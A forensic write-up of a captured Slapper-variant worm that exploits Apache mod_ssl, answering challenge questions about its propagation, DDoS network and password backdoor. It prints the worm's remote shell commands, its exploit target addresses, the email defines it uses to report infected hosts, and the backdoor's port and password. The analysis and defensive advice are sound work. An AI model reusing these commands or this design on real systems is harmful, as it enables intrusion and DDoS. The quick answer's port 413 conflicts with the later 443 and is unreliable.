The scan

This scan consists of analyzing a file that contains a worm captured in a honeynet. The skills required to do the analysis are mainly, C and UNIX programming. Software needed is included in any basic unix-like OS (or any other with tools like 'ls', 'file', 'tar', 'gunzip', and an editor, better with C syntax highlighting).

These are the questions to be answered in the analysis, with their quick answers. After that, a more detailed question answering will be made.


1. Which is the type of the .unlock file? When was it
   generated?

   It is a .tar.gz file, generated on Sept 22th, 2002

2. Based on the source code, who is the author of this worm?  When
   it was created?  Is it compatible with the date from question 1?
   
   The code is based on a previously existing worm by contem,
   slightly modified by aion.
   
   2002-09-20 15:28 .unlock.c
   2002-09-19 23:57 .update.c
   
   The dates are compatible with question one.

3. Which process name is used by the worm when it is running?

   'httpd' for the worm itself, and 'update' for the installed
   backdoor.

4. In wich format the worm copies itself to the new infected
   machine?  Which files are created in the whole process?  After
   the worm executes itself, wich files remain on the infected machine?

   After compromising the remote system, the file is sent uuencoded.
   New files are: /tmp/.unlock.uu
                  /tmp/.unlock
                  /tmp/.unlock.c
                  /tmp/.update.c
                  /tmp/httpd
                  /tmp/update 
		  
    The only file remaining after the execution is /tmp/.unlock

5. Which port is scanned by the worm?

   Port 80, tcp.

6. Which vulnerability the worm tries to exploit?  In which architectures?

   Apache + mod_ssl's SSL handshake vulnerability, at port 413 tcp. Exploits
   apache on Gentoo, Debian, RedHat, SuSE, Mandrake and Slackware linux, always
   on ix86 architecture.

7. What kind of information is sent by the worm by email?  To
   which account?
   
   A host identifier, the host name, and the address of the system that
   compromised it is sent to aion@ukr.net.

8. Which port (and protocol) is used by the worm to communicate to
   other infected machines?
   
   A P2P protocol especially designed to make DDoS attacks, over UDP,
   port 4156.

9. Name 3 functionalities built in the worm to attack
   other networks.
   
   Launch udp floods, tcp floods (ipv4 and ipv6) and dns floods.

10.What is the purpose of the .update.c program?  Which
   port does it use?
   
   It is a program that listens on tcp port 1052, and spawns a
   shell to the connecter that supplies the correct password
   'aion1981'.

Bonus Question: What is the purpose of the SLEEPTIME and UPTIME
values in the .update.c program?

   It is a method of hiding the backdoor to the admins or port scans.
   The program listens for connections for UPTIME seconds, then
   sleeps SLEEPTIME seconds, then listens again.
   

Detailed analysis

The first step is the file integrity check:

kl4rk@kenshin scan25w $ md5sum .unlock 
a03b5be9264651ab30f2223592befb42        .unlock
kl4rk@kenshin scan25w $ sha1sum .unlock 
4b018cdfdbcf71ddaa789e8ecc9ed7700660021a  .unlock

Both match the hashes found in the website.


(1) Which is the type of the .unlock file? When was it generated?

Apparently, Sept 22th 2002:

kl4rk@kenshin scan25w $ ls -la
total 48
drwxr-xr-x    2 kl4rk    users        4096 2002-11-20 20:37 .
drwxr-xr-x    3 kl4rk    users        4096 2002-11-20 20:39 ..
-rw-r--r--    1 kl4rk    users       17973 2002-09-22 19:06 .unlock

And the file type is a gzipped tar archive (tar.gz):

kl4rk@kenshin scan25w $ file .unlock 
.unlock: gzip compressed data, from Unix
kl4rk@kenshin scan25w $ file -z .unlock
.unlock: GNU tar archive (gzip compressed data, from Unix)

(2) Based on the source code, who is the author of this worm? When it was created? Is it compatible with the date from question 1?

kl4rk@kenshin scan25w $ cp .unlock unlock.tar.gz
kl4rk@kenshin scan25w $ tar -xvzf unlock.tar.gz && rm unlock.tar.gz
.unlock.c
.update.c
kl4rk@kenshin scan25w $ chmod a-w .*.c
kl4rk@kenshin scan25w $ ls -la
total 128
drwxr-xr-x    2 kl4rk    users        4096 2002-11-20 20:42 .
drwxr-xr-x    3 kl4rk    users        4096 2002-11-20 20:46 ..
-rw-r--r--    1 kl4rk    users       17973 2002-09-22 19:06 .unlock
-r--r--r--    1 kl4rk    users       70981 2002-09-20 15:28 .unlock.c
-r--r--r--    1 kl4rk    users        2792 2002-09-19 23:57 .update.c

Both extracted files' date are prior to the .tar.gz archive, so they are compatible with the answer of question one.

A quick view of .unlock.c shows that the author of most of the worm's code is contem, with some modifications by aion (aion@ukr.net). The .update.c file, though, is written entirely by aion.

So, what aion did is produce a new worm heavily based on a previously existing one, but adding some new features of aion's interest. Code added by aion can be found in .unlock.c by searching for his nickname through the file. The other file, .update.c, is entirely written by him/her.

A search on google with keyworks Peer-to-peer UDP Distributed Denial of Service (PUD) shows that the comments in the beginning of .unlock.c are also on "Slapper" (2002-09-12), which is a version of "Scalper" worm (2002-04-26). The dates of the extracted files confirm that the worm of this scan is another version of the worms 'Slapper' and 'Scalper'.


(3) Which process name is used by the worm when it is running?

The code strcpy(argv[0],PSNAME); in .unlock.c, line 1805, sets the program name to "httpd". This is a common trick to hide the real name of a running program, so that commands that monitor system activity like 'ps', 'netstat', 'top', etc will display a program name less suspicious than '/tmp/filename'.

Also, as seen in the next answer, a process named 'update' will be running on the system. This is a backdoor added to the worm by aion.


(4) In wich format the worm copies itself to the new infected machine? Which files are created in the whole process? After the worm executes itself, wich files remain on the infected machine?

The code in the function sh() has been modified by the author of the worm. Analyzing this code will let us understand the steps followed by the worm to replicate itself after the remote system has been compromised. The commands sent to the remote shell are, as seen in .unlock.c, lines 1411 to 1428:


export TERM=xterm;export HOME=/tmp;export HISTFILE=/dev/null
export PATH=$PATH:/bin:/sbin:/usr/bin:/usr/sbin
exec bash -i

(Which exec's the bash shell. Then, these are the commands for bash to run)

rm -rf /tmp/.unlock.uu /tmp/.unlock.c /tmp/.update.c /tmp/httpd /tmp/update /tmp/.unlock
cat > /tmp/.unlock.uu << __eof__

(uuencoded contents of .unlock file are sent here)

__eof__
uudecode -o /tmp/.unlock /tmp/.unlock.uu;
tar xzf /tmp/.unlock -C /tmp/
gcc -o /tmp/httpd  /tmp/.unlock.c -lcrypto
gcc -o /tmp/update /tmp/.update.c

/tmp/httpd %s (where %s stands for the already infected computer IP)
/tmp/update  

rm -rf /tmp/.unlock.uu /tmp/.unlock.c /tmp/.update.c /tmp/httpd /tmp/update
exit

So, the worm sends itself in uuencoded format (to /tmp/.unlock.uu). Then, uudecodes it (to /tmp/.unlock), untargz's /tmp/.unlock (generating /tmp/.unlock.c and /tmp/.update.c) compiles both files (generating /tmp/httpd and /tmp/update).

First /tmp/httpd is run, with the ip address of the computer that is sending the worm. This is probably to keep the new infected computer in contact with the already infected. The intention of the author is to build a group of slave computers for him/her to launch DDoS attacks (or actually, any other purpose, because he/she can gain access to a remote shell, as we will see afterwards).

Afterwards, /tmp/update is run. The purpose of this program is also discussed later on.

Finally, .ulock.uu, .unlock.c, .update.c, httpd and update, all in /tmp, are removed. This leaves /tmp/.unlock as the only file remaining on the disk, while all others are deleted.


(5) Which port is scanned by the worm?

The initial #define SCANPORT 80 in the code suggests port 80. After a deeper look at the code, this is confirmed. In the main routine, after line 1907, some IP addresses are semi-randomly chosen, then port SCANPORT is scanned on each. If the connection succeeds, then (line 1933) the program calls expoit(srv), being srv the previously scanned IP address.


(6) Which vulnerability the worm tries to exploit? In which architectures?

The exploit() routine tries to connect target host on port 443, the https port (http over SSL). Apparently, this will be an apache bug. The architectures that are to be exploited are:

architectures[] = {
	{"Gentoo", "", 0x08086c34},
	{"Debian", "1.3.26", 0x080863cc},
	{"Red-Hat", "1.3.6", 0x080707ec},
	{"Red-Hat", "1.3.9", 0x0808ccc4},
	{"Red-Hat", "1.3.12", 0x0808f614},
	{"Red-Hat", "1.3.12", 0x0809251c},
	{"Red-Hat", "1.3.19", 0x0809af8c},
	{"Red-Hat", "1.3.20", 0x080994d4},
	{"Red-Hat", "1.3.26", 0x08161c14},
	{"Red-Hat", "1.3.23", 0x0808528c},
	{"Red-Hat", "1.3.22", 0x0808400c},
	{"SuSE", "1.3.12", 0x0809f54c},
	{"SuSE", "1.3.17", 0x08099984},
	{"SuSE", "1.3.19", 0x08099ec8},
	{"SuSE", "1.3.20", 0x08099da8},
	{"SuSE", "1.3.23", 0x08086168},
	{"SuSE", "1.3.23", 0x080861c8},
	{"Mandrake", "1.3.14", 0x0809d6c4},
	{"Mandrake", "1.3.19", 0x0809ea98},
	{"Mandrake", "1.3.20", 0x0809e97c},
	{"Mandrake", "1.3.23", 0x08086580},
	{"Slackware", "1.3.26", 0x083d37fc},
	{"Slackware", "1.3.26",0x080b2100}
};

The first string is the linux distribution name, the second is the version of httpd and the third is some internal exploit info, the address to overwrite with a buffer overflow or other technique.

The vulnerability exploit occurs during the SSL handshake, on different versions of Apache running on linux with mod_ssl. The 0x08xxxxxx adresses are typical from linux/x86 exploits, and also, the shellcode is for x86. So, the targeted platform is linux on ix86 processors.


(7) What kind of information is sent by the worm by email? To which account?

The main routine calls mailme(argv[1]). The code in funtion mailme is very easy to understand and sends a mail with this info:


hostid a unique host identifier (see gethostid(2))
hostname the exploited system hostname
att_from the ip address of the system that exploited the victim

The account and mail server are defined early in the code:


#define MAILSRV  	"freemail.ukr.net"
#define MAILTO    	"aion@ukr.net"

(8) Which port (and protocol) is used by the worm to communicate to other infected machines?

The worm uses a complex P2P protocol over UDP, as explained in initial file comments, designed by contem especially as a tool for DDoS attacks. When /tmp/httpd (code from .unlock.c) is run, the server starts listening on port 4156:

(line 66) 
        #define PORT		4156
	
(around line 1781)

	if (audp_listen(&udpserver,PORT) != 0) {
		printf("Error: %s\n",aerror(&udpserver));
		return 0;
	}

(9) Name 3 functionalities built in the worm to attack other networks.

After the program is listening on that UDP port, clients can connect to access some functionalities. This is found around line 2033. clients can, in order to attack other networks, launch udp floods, tcp floods (ipv4 and ipv6), dns floods among other DoS utilities. Also, commands for the server to execute can be sent, and bounces to other computers, so that attacker can access other networks and anonymize himself/herself.


(10) What is the purpose of the .update.c program? Which port does it use? + BOUNS QUESTION

This program creates a child process and exits immediately. The child process opens port 1052, and spawns a shell for the client that will supply a correct password. That password is "aion1981". After 10 seconds, the program stops listening, sleeps for 5 minutes then goes back to listening.

This program's purpose is, then, to grant an easy entry for the attacker to remotely control the system. By listening only for 10 seconds, it hides itself from TCP scans and the administrator, and the attacker can, within 5 minutes or less, have a remote shell on the compromised computer.

So, SLEEPTIME is the 300 seconds (5 minutes) of sleeping, while UPTIME is the 10 seconds of listening (waiting for connections).


Conclusions

There are many questions that remain unanswered. The biggest is, why is the source code distributed with the worm? Distribuiting only the stripped binary without source code would make the worm much more difficult to analyze. And as all exploited systems are linux/x86, the same binary should work for all infected computers.

Also, it is suprising the .update.c backdoor that is included with the worm. Its program name is set to "update   " (three whitespaces?), and the other backdoor that is set can also run sent commands.

Appart from that, the worm's backdoors can be easily blocked by setting strict firewall rules, which should not allow the upd and tcp traffic to the host on the ports of both backdoors. To avoid the infection, I suggest using /tmp as a partition sepparate from the root one, and mounting it with option noexec. This would stop not only this worm but lots of others, and also most script-kiddie attacks.


 written by Josep Sanjuás, aka kl4rk - kl4rk@softhome.net